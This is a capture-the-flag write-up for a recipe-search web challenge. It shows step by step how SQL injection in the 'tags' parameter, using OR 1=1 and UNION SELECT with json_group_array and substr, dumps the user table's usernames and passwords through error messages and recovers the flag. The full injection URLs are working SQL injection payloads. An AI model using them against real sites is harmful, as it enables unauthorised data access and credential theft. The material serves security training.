No provided files for this challenge, just a link.
We only have a form to search recipe.
First step is to get an error of the sql search.
https://cooking.chal.cyberjousting.com/search?recipe_name=&description=&tags=%27%20OR%201=1%20–
With this error, we can know the server is an SQLight3 server.
We can easily get all recipes, but nothing particular.
https://cooking.chal.cyberjousting.com/search?tags=%27%20OR%201=1%20)%20–
The next step is to dump the users database.
First step is to get the name of the database. With an union, we get an error :
sqlite3.OperationalError: no such table: users
After a few test, we understand the database is user.
After more tests, we can leak the list of usernames :
https://cooking.chal.cyberjousting.com/search?recipe_name=&description=&tags=%27)%20UNION%20SELECT%20json_group_array(username),%20json_group_array(password),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username)%20FROM%20user%20–
The first user is admin, let’s get his password :
https://cooking.chal.cyberjousting.com/search?recipe_name=&description=&tags=%27)%20UNION%20SELECT%20json_group_array(username),%20json_group_array(password),%20json_group_array(password),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username)%20FROM%20user%20–
Input should be a valid date or datetime, invalid character in year [type=date_from_datetime_parsing, input_value=’[“byuctf{pl34s3_p4r4m3t3…xistheworst”,”gobyu84”]’, input_type=str]
Now with a substring we can get the password (20 character by request) !
https://cooking.chal.cyberjousting.com/search?recipe_name=&description=&tags=%27)%20UNION%20SELECT%20json_group_array(substr(password,%201,%2020)),%20json_group_array(password),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username)%20FROM%20user%20–
Input should be a valid integer, unable to parse string as an integer [type=int_parsing, input_value=’[“byuctf{pl34s3_p4r4m3”,…xistheworst”,”gobyu84”]’, input_type=str]
Input should be a valid integer, unable to parse string as an integer [type=int_parsing, input_value=’[“t3r1z3_y0ur_1nputs_4”,””,””]’, input_type=str]
Input should be a valid integer, unable to parse string as an integer [type=int_parsing, input_value=’[“nd_h4sh_p4ssw0rds}”,””,””]’, input_type=str]
byuctf{pl34s3_p4r4m3
t3r1z3_y0ur_1nputs_4
nd_h4sh_p4ssw0rds}
byuctf{pl34s3_p4r4m3t3r1z3_y0ur_1nputs_4nd_h4sh_p4ssw0rds}